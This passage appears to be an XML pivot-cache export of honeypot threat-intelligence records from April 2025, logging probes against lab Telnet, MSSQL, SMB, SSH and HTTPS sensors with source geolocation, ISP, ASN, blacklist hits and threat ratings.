    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="MK"/>
    <s v="North Macedonia"/>
    <s v="NA"/>
    <s v="Grad Skopje"/>
    <s v="NA"/>
    <s v="Skopje"/>
    <s v="785842"/>
    <s v="NA"/>
    <s v="41.9965"/>
    <s v="21.4314"/>
    <s v="6821"/>
    <s v="Makedonski Telekom AD-Skopje"/>
    <s v="Makedonski Telekom AD-Skopje"/>
    <s v="cellular"/>
    <s v="MT Adsl"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:4d1c:b9a9"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2195"/>
    <x v="2195"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T21:27:09"/>
    <d v="2024-06-22T07:57:34"/>
    <d v="2025-04-11T21:27:09"/>
    <n v="88"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_SMB_H36&amp;&amp;SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_SSH_H34&amp;&amp;SMA-LAB_MT-CPA_H34&amp;&amp;SMA-LAB_MSSQL_H26&amp;&amp;SMA-LAB_MSSQL_H36&amp;&amp;SMA-LAB_SMB_H44&amp;&amp;SMA-LAB_MSSQL_H44&amp;&amp;SMA-LAB_SMB_H23&amp;&amp;SMA-LAB_MSSQL_H23&amp;&amp;SMA-LAB_SMB_H24&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="445&amp;&amp;1433&amp;&amp;22&amp;&amp;31521"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="PY"/>
    <s v="Puducherry"/>
    <s v="Pondicherry"/>
    <s v="Puducherry"/>
    <s v="1259425"/>
    <s v="NA"/>
    <s v="11.9338"/>
    <s v="79.8298"/>
    <s v="141552"/>
    <s v="Interjet India Private Limited"/>
    <s v="Interjet India Private Limited"/>
    <s v="business"/>
    <s v="Interjet India Private Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.186.120.72,60103)}&amp;&amp;{Data_SMB:Incoming connection (103.186.120.72,60787)}&amp;&amp;{Data_SMB:Incoming connection (103.186.120.72,56553)}&amp;&amp;{Data_SMB:Incoming connection (103.186.120.72,57031)}&amp;&amp;{Data_SMB:Incoming connection (103.186.120.72,49599)}&amp;&amp;{Data_SMB:Incoming connection (103.186.120.72,50088)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.186.120.72,64959)}&amp;&amp;{Data_SMB:Incoming connection (103.186.120.72,50181)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.186.120.72,61528)}&amp;&amp;{Data_SMB:Incoming connection (103.186.120.72,64671)}&amp;&amp;{Data_SMB:Incoming connection (103.186.120.72,65145)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.186.120.72,56781)}&amp;&amp;{Data_SMB:Incoming connection (103.186.120.72,57315)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.186.120.72,52651)}&amp;&amp;{Data_SMB:Incoming connection (103.186.120.72,53071)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:67ba:7848"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2196"/>
    <x v="2196"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T21:20:31"/>
    <d v="2025-04-11T21:20:31"/>
    <d v="2025-04-11T21:20:31"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="SY"/>
    <s v="Syria"/>
    <s v="DI"/>
    <s v="Dimashq"/>
    <s v="NA"/>
    <s v="Damascus"/>
    <s v="170654"/>
    <s v="NA"/>
    <s v="33.5132"/>
    <s v="36.2768"/>
    <s v="29256"/>
    <s v="INT-PDN-STE-AS"/>
    <s v="Syriatel-Mobile"/>
    <s v="consumer"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:5efc:e613"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2197"/>
    <x v="2197"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T21:17:16"/>
    <d v="2025-04-11T21:17:16"/>
    <d v="2025-04-11T21:17:16"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KL"/>
    <s v="Kerala"/>
    <s v="Ernakulam"/>
    <s v="Piravam"/>
    <s v="1259541"/>
    <s v="NA"/>
    <s v="9.86667"/>
    <s v="76.5"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Mumbai"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb6:b7d8"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2198"/>
    <x v="2198"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T21:09:26"/>
    <d v="2025-04-11T19:51:29"/>
    <d v="2025-04-11T21:09:26"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H15"/>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NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b5d:8908"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2199"/>
    <x v="2199"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T21:02:53"/>
    <d v="2025-04-11T21:02:53"/>
    <d v="2025-04-11T21:02:53"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'dnsbl-3.uceprotect.net': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AF"/>
    <s v="Africa"/>
    <s v="TZ"/>
    <s v="Tanzania"/>
    <s v="02"/>
    <s v="Dar es Salaam Region"/>
    <s v="Ilala District"/>
    <s v="Dar es Salaam"/>
    <s v="160263"/>
    <s v="NA"/>
    <s v="-6.81899"/>
    <s v="39.2867"/>
    <s v="33765"/>
    <s v="TTCLDATA"/>
    <s v="Tanzania Telecommunications CO. LTD"/>
    <s v="corporate"/>
    <s v="Ttcl"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:293b:de5c"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2200"/>
    <x v="2200"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T21:01:32"/>
    <d v="2025-04-11T21:01:32"/>
    <d v="2025-04-11T21:01:32"/>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f:f6fd"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2201"/>
    <x v="2201"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T21:00:56"/>
    <d v="2024-05-07T22:22:00"/>
    <d v="2025-04-11T21:00:56"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="50132&amp;&amp;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2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="NA&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75ce:8527"/>
    <s v="None"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2202"/>
    <x v="2202"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T20:35:17"/>
    <d v="2025-03-14T19:22:57"/>
    <d v="2025-04-11T20:35:17"/>
    <n v="5"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MYSQL_H26"/>
    <s v="1433&amp;&amp;3306"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="JI"/>
    <s v="East Java"/>
    <s v="Kabupaten Nganjuk"/>
    <s v="Kertosono"/>
    <s v="1640185"/>
    <s v="NA"/>
    <s v="-7.63968"/>
    <s v="112.016"/>
    <s v="152769"/>
    <s v="PT Gopal Network Solusindo"/>
    <s v="Gopalnet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2024-01-22"/>
    <s v="IDNIC-GOPALNET-ID"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:9d0f:9e"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2203"/>
    <x v="2203"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T20:22:41"/>
    <d v="2025-04-11T20:22:41"/>
    <d v="2025-04-11T20:22:41"/>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rporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75d0:d2d5"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2204"/>
    <x v="2204"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T20:13:09"/>
    <d v="2025-04-11T20:11:54"/>
    <d v="2025-04-11T20:13:09"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="57"/>
    <s v="Bình Dương Province"/>
    <s v="Huyện Dầu Tiêng"/>
    <s v="Dầu Tiếng"/>
    <s v="1583699"/>
    <s v="NA"/>
    <s v="11.2741"/>
    <s v="106.359"/>
    <s v="7552"/>
    <s v="Viettel Group"/>
    <s v="Viettel Corporation"/>
    <s v="residential"/>
    <s v="xDSL Services"/>
    <s v="2005-10-25"/>
    <s v="VIETTEL-VN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7deb:e598"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2205"/>
    <x v="2205"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T20:08:23"/>
    <d v="2025-04-11T20:08:23"/>
    <d v="2025-04-11T20:08:23"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="AP"/>
    <s v="Andhra Pradesh"/>
    <s v="West Godavari"/>
    <s v="Tādepallegūdem"/>
    <s v="1255264"/>
    <s v="NA"/>
    <s v="16.8147"/>
    <s v="81.5272"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="consumer"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3d03:3120"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2206"/>
    <x v="2206"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T19:54:50"/>
    <d v="2025-04-11T19:01:24"/>
    <d v="2025-04-11T19:54:50"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H5"/>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2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75c1:b235"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2207"/>
    <x v="2207"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T19:33:55"/>
    <d v="2025-04-11T19:33:55"/>
    <d v="2025-04-11T19:33:55"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="WB"/>
    <s v="West Bengal"/>
    <s v="Howrah"/>
    <s v="Chakapara"/>
    <s v="1348753"/>
    <s v="NA"/>
    <s v="22.6322"/>
    <s v="88.3486"/>
    <s v="17488"/>
    <s v="HATHWAY-NET-AP"/>
    <s v="Hathway IP over Cable Internet Access"/>
    <s v="consumer"/>
    <s v="Hathway Cable and Datacom Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7360:1ae4"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2208"/>
    <x v="2208"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T19:29:52"/>
    <d v="2025-04-11T17:22:53"/>
    <d v="2025-04-11T19:29:52"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_HC1"/>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2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75c7:9b34"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2209"/>
    <x v="2209"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T19:27:53"/>
    <d v="2025-01-18T03:43:17"/>
    <d v="2025-04-11T19:27:53"/>
    <n v="25"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_HC1"/>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2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75f1:b728"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2210"/>
    <x v="2210"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T19:25:42"/>
    <d v="2025-04-11T19:25:05"/>
    <d v="2025-04-11T19:25:42"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_HTTPS_HC1"/>
    <s v="8443"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TR"/>
    <s v="Turkey"/>
    <s v="25"/>
    <s v="Erzurum"/>
    <s v="NA"/>
    <s v="Erzurum"/>
    <s v="315368"/>
    <s v="NA"/>
    <s v="39.9055"/>
    <s v="41.2658"/>
    <s v="47331"/>
    <s v="TTNet A.S."/>
    <s v="TurkTelekom"/>
    <s v="business"/>
    <s v="Turk Telekomunikasyon Anonim Sirketi"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;GET"/>
    <s v="{Data_HTTPS:{'Accept': 'text/plain,text/html', 'Host': '103.211.202.140', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:5f09:edcb"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2211"/>
    <x v="2211"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T19:05:34"/>
    <d v="2025-04-11T19:05:34"/>
    <d v="2025-04-11T19:05:34"/>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d:747f"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2212"/>
    <x v="2212"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T18:56:16"/>
    <d v="2025-04-11T18:54:50"/>
    <d v="2025-04-11T18:56:16"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'z.mailspike.net': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="66"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="SG"/>
    <s v="Ho Chi Minh"/>
    <s v="Quận Mười"/>
    <s v="Quận Mười"/>
    <s v="9645085"/>
    <s v="NA"/>
    <s v="10.7682"/>
    <s v="106.666"/>
    <s v="45899"/>
    <s v="VNPT Corp"/>
    <s v="VNPT"/>
    <s v="business"/>
    <s v="Vietnam Posts and Telecommunications Group"/>
    <s v="2010-08-16"/>
    <s v="VNPT-VN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ebf:5ea7"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2213"/>
    <x v="2213"/>
    <s v="wsip-98-175-194-217.om.om.cox.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-11T18:55:06"/>
    <d v="2025-04-05T21:03:34"/>
    <d v="2025-04-11T18:55:06"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="NE"/>
    <s v="Nebraska"/>
    <s v="Douglas"/>
    <s v="Omaha"/>
    <s v="5074472"/>
    <s v="68197"/>
    <s v="41.2565"/>
    <s v="-95.9345"/>
    <s v="22773"/>
    <s v="Cox Communications Inc."/>
    <s v="Cox Communications Inc."/>
    <s v="business"/>
    <s v="Cox Communications"/>
    <s v="2007-07-20"/>
    <s v="CXA"/>
    <s v="2012-03-02"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <x v="1"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:62af:c2d9"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2214"/>
    <x v="2214"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T18:50:35"/>
    <d v="2025-04-11T18:50:35"/>
    <d v="2025-04-11T18:50:35"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
